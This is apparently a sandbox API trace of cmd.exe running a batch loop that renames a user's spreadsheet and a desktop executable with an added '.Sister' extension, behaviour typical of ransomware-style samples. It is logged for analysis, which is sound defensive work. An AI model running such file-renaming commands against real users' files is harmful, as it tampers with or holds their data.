GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0304.045] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.045] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3e, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3e) returned 1 [0304.046] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0304.046] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.046] GetFileType (hFile=0x50) returned 0x2 [0304.046] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.046] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0304.048] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.048] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0304.048] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0304.048] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.048] GetFileType (hFile=0x50) returned 0x2 [0304.048] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.049] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0304.049] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.049] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0304.049] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0304.049] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.049] GetFileType (hFile=0x50) returned 0x2 [0304.050] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.050] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0304.050] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.050] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0304.051] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0304.051] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.051] GetFileType (hFile=0x50) returned 0x2 [0304.051] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.051] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0304.051] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.051] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0304.058] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.058] GetFileType (hFile=0x50) returned 0x2 [0304.058] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.058] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0304.058] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.058] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d56f80*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d56f80*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0304.059] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"34r863GjrxofmdERZ-U.xlsx.Sister\" \"34r863GjrxofmdERZ-U.bat\" ") returned 61 [0304.059] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.059] GetFileType (hFile=0x50) returned 0x2 [0304.059] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.059] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0304.059] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.059] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3d, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3d) returned 1 [0304.064] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0304.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.064] GetFileType (hFile=0x50) returned 0x2 [0304.064] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.064] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0304.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.065] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0304.071] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0304.072] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0304.072] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0304.072] malloc (_Size=0xffce) returned 0x21eda13ff80 [0304.072] ??_V@YAXPEAX@Z () returned 0x21eda13ff80 [0304.072] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0304.072] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0304.072] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0304.072] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0304.072] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0304.072] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0304.072] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0304.072] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0304.072] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0304.072] ??_V@YAXPEAX@Z () returned 0x1 [0304.073] GetProcessHeap () returned 0x21ed8c70000 [0304.073] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x108) returned 0x21ed8c727b0 [0304.073] GetProcessHeap () returned 0x21ed8c70000 [0304.073] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c727b0, Size=0x8c) returned 0x21ed8c727b0 [0304.073] GetProcessHeap () returned 0x21ed8c70000 [0304.073] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c727b0) returned 0x8c [0304.073] GetProcessHeap () returned 0x21ed8c70000 [0304.073] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x94) returned 0x21ed8d44720 [0304.073] GetProcessHeap () returned 0x21ed8c70000 [0304.073] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x108) returned 0x21ed8c72850 [0304.073] GetProcessHeap () returned 0x21ed8c70000 [0304.073] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c72850, Size=0x8c) returned 0x21ed8c72850 [0304.073] GetProcessHeap () returned 0x21ed8c70000 [0304.073] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c72850) returned 0x8c [0304.073] malloc (_Size=0xffce) returned 0x21eda13ff80 [0304.073] ??_V@YAXPEAX@Z () returned 0x21eda13ff80 [0304.074] GetProcessHeap () returned 0x21ed8c70000 [0304.074] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7ce80 [0304.074] GetProcessHeap () returned 0x21ed8c70000 [0304.074] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d30dc0 [0304.074] _wcsicmp (_String1="34r863GjrxofmdERZ-U.xlsx", _String2=".") returned 5 [0304.074] _wcsicmp (_String1="34r863GjrxofmdERZ-U.xlsx", _String2="..") returned 5 [0304.074] GetFileAttributesW (lpFileName="34r863GjrxofmdERZ-U.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\34r863gjrxofmderz-u.xlsx")) returned 0x20 [0304.074] GetProcessHeap () returned 0x21ed8c70000 [0304.074] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed93a0060 [0304.075] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed93a0070 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0304.076] SetErrorMode (uMode=0x0) returned 0x0 [0304.076] SetErrorMode (uMode=0x1) returned 0x0 [0304.076] GetFullPathNameW (in: lpFileName="34r863GjrxofmdERZ-U.xlsx", nBufferLength=0x7fe7, lpBuffer=0x21eda13ff80, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\34r863GjrxofmdERZ-U.xlsx", lpFilePart=0xa6cf4fd660*="34r863GjrxofmdERZ-U.xlsx") returned 0x32 [0304.076] SetErrorMode (uMode=0x0) returned 0x1 [0304.076] GetProcessHeap () returned 0x21ed8c70000 [0304.076] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d312a0 [0304.076] _wcsicmp (_String1="34r863GjrxofmdERZ-U.xlsx", _String2=".") returned 5 [0304.076] _wcsicmp (_String1="34r863GjrxofmdERZ-U.xlsx", _String2="..") returned 5 [0304.076] GetFileAttributesW (lpFileName="34r863GjrxofmdERZ-U.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\34r863gjrxofmderz-u.xlsx")) returned 0x20 [0304.076] ??_V@YAXPEAX@Z () returned 0x1 [0304.076] malloc (_Size=0xffce) returned 0x21eda13ff80 [0304.076] ??_V@YAXPEAX@Z () returned 0x21eda13ff80 [0304.076] malloc (_Size=0xffce) returned 0x21eda14ff60 [0304.077] ??_V@YAXPEAX@Z () returned 0x21eda14ff60 [0304.077] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\34r863GjrxofmdERZ-U.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\34r863gjrxofmderz-u.xlsx")) returned 0x20 [0304.077] malloc (_Size=0xffce) returned 0x21ed993f900 [0304.077] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0304.077] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\34r863GjrxofmdERZ-U.xlsx", fInfoLevelId=0x1, lpFindFileData=0x21ed8d30dd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed8d30dd0) returned 0x21ed8c7cee0 [0304.078] malloc (_Size=0xffce) returned 0x21ed994f8e0 [0304.078] ??_V@YAXPEAX@Z () returned 0x21ed994f8e0 [0304.078] ??_V@YAXPEAX@Z () returned 0x1 [0304.078] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\34r863GjrxofmdERZ-U.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\34r863gjrxofmderz-u.xlsx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\34r863GjrxofmdERZ-U.xlsx.Sister" (normalized: "c:\\users\\fd1hvy\\documents\\34r863gjrxofmderz-u.xlsx.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0304.079] FindNextFileW (in: hFindFile=0x21ed8c7cee0, lpFindFileData=0x21ed8d30dd0 | out: lpFindFileData=0x21ed8d30dd0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb85ebb0, ftCreationTime.dwHighDateTime=0x1d592c8, ftLastAccessTime.dwLowDateTime=0xdc91b910, ftLastAccessTime.dwHighDateTime=0x1d5ac26, ftLastWriteTime.dwLowDateTime=0xdc91b910, ftLastWriteTime.dwHighDateTime=0x1d5ac26, nFileSizeHigh=0x0, nFileSizeLow=0x791d, dwReserved0=0x0, dwReserved1=0x0, cFileName="34r863GjrxofmdERZ-U.xlsx", cAlternateFileName="")) returned 0 [0304.082] GetLastError () returned 0x12 [0304.082] FindClose (in: hFindFile=0x21ed8c7cee0 | out: hFindFile=0x21ed8c7cee0) returned 1 [0304.083] ??_V@YAXPEAX@Z () returned 0x1 [0304.083] ??_V@YAXPEAX@Z () returned 0x1 [0304.083] ??_V@YAXPEAX@Z () returned 0x1 [0304.083] ??_V@YAXPEAX@Z () returned 0x1 [0304.083] GetProcessHeap () returned 0x21ed8c70000 [0304.083] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7d060 [0304.083] GetProcessHeap () returned 0x21ed8c70000 [0304.083] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c954e0, Size=0x16) returned 0x21ed8c95a40 [0304.083] GetProcessHeap () returned 0x21ed8c70000 [0304.083] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95a40) returned 0x16 [0304.083] GetProcessHeap () returned 0x21ed8c70000 [0304.083] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45cb0, Size=0x20) returned 0x21ed8d45d40 [0304.083] GetProcessHeap () returned 0x21ed8c70000 [0304.083] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45d40) returned 0x20 [0304.083] GetProcessHeap () returned 0x21ed8c70000 [0304.083] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8d6bda0 [0304.083] GetProcessHeap () returned 0x21ed8c70000 [0304.083] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6bda0, Size=0xb2) returned 0x21ed8c967c0 [0304.083] GetProcessHeap () returned 0x21ed8c70000 [0304.083] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c967c0) returned 0xb2 [0304.084] GetProcessHeap () returned 0x21ed8c70000 [0304.084] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed93b0050 [0304.084] GetProcessHeap () returned 0x21ed8c70000 [0304.084] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93b0050, Size=0x30) returned 0x21ed93b0050 [0304.084] GetProcessHeap () returned 0x21ed8c70000 [0304.084] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b0050) returned 0x30 [0304.084] GetProcessHeap () returned 0x21ed8c70000 [0304.084] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed93b0090 [0304.084] malloc (_Size=0x1ff9c) returned 0x21eda13ff80 [0304.085] GetProcessHeap () returned 0x21ed8c70000 [0304.085] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed8c96d00 [0304.085] GetProcessHeap () returned 0x21ed8c70000 [0304.085] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed8c96280 [0304.085] ??_V@YAXPEAX@Z () returned 0x1 [0304.085] malloc (_Size=0x1ff9c) returned 0x21eda13ff80 [0304.085] GetProcessHeap () returned 0x21ed8c70000 [0304.085] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed8c96340 [0304.085] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21eda13ff80, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0304.085] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c728b0, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7c9a0 [0304.086] FindClose (in: hFindFile=0x21ed8c7c9a0 | out: hFindFile=0x21ed8c7c9a0) returned 1 [0304.086] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c728b0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cee0 [0304.086] FindClose (in: hFindFile=0x21ed8c7cee0 | out: hFindFile=0x21ed8c7cee0) returned 1 [0304.086] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c728b0, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7cee0 [0304.086] FindClose (in: hFindFile=0x21ed8c7cee0 | out: hFindFile=0x21ed8c7cee0) returned 1 [0304.086] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c728b0, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0304.087] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0304.087] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0304.087] GetProcessHeap () returned 0x21ed8c70000 [0304.087] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d677b0 [0304.087] ??_V@YAXPEAX@Z () returned 0x1 [0304.087] ??_V@YAXPEAX@Z () returned 0x1 [0304.087] GetProcessHeap () returned 0x21ed8c70000 [0304.087] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93b0090, Size=0x490) returned 0x21ed93b0090 [0304.087] GetProcessHeap () returned 0x21ed8c70000 [0304.087] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b0090) returned 0x490 [0304.087] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0304.087] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.087] GetFileType (hFile=0x50) returned 0x2 [0304.087] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.087] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0304.088] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.088] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0304.204] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0304.204] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Documents") returned 25 [0304.204] _vsnwprintf (in: _Buffer=0x21ed8e80192, _BufferCount=0x83cc, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0304.204] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.204] GetFileType (hFile=0x50) returned 0x2 [0304.204] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.204] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0304.204] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.204] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x1a) returned 1 [0304.205] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.205] GetFileType (hFile=0x50) returned 0x2 [0304.205] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.205] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0304.206] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.206] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed93b0060*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed93b0060*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0304.206] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0304.206] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.206] GetFileType (hFile=0x50) returned 0x2 [0304.206] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.206] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0304.208] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.208] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0304.212] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0304.212] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.212] GetFileType (hFile=0x50) returned 0x2 [0304.213] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.213] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0304.213] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.213] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0304.220] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0304.220] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0304.220] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0304.220] malloc (_Size=0xffce) returned 0x21eda13ff80 [0304.220] ??_V@YAXPEAX@Z () returned 0x21eda13ff80 [0304.221] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0304.221] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0304.221] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0304.221] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0304.221] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0304.221] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0304.221] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0304.221] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0304.221] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0304.221] ??_V@YAXPEAX@Z () returned 0x1 [0304.221] GetProcessHeap () returned 0x21ed8c70000 [0304.221] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5f260 [0304.221] GetProcessHeap () returned 0x21ed8c70000 [0304.221] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5f260, Size=0x130) returned 0x21ed8d62950 [0304.221] GetProcessHeap () returned 0x21ed8c70000 [0304.221] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d62950) returned 0x130 [0304.221] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0304.221] malloc (_Size=0xffce) returned 0x21eda13ff80 [0304.221] ??_V@YAXPEAX@Z () returned 0x21eda13ff80 [0304.222] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0304.222] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21eda13ff80, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0304.223] ??_V@YAXPEAX@Z () returned 0x1 [0304.223] GetProcessHeap () returned 0x21ed8c70000 [0304.223] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d62d10 [0304.223] GetProcessHeap () returned 0x21ed8c70000 [0304.223] RtlAllocateHeap 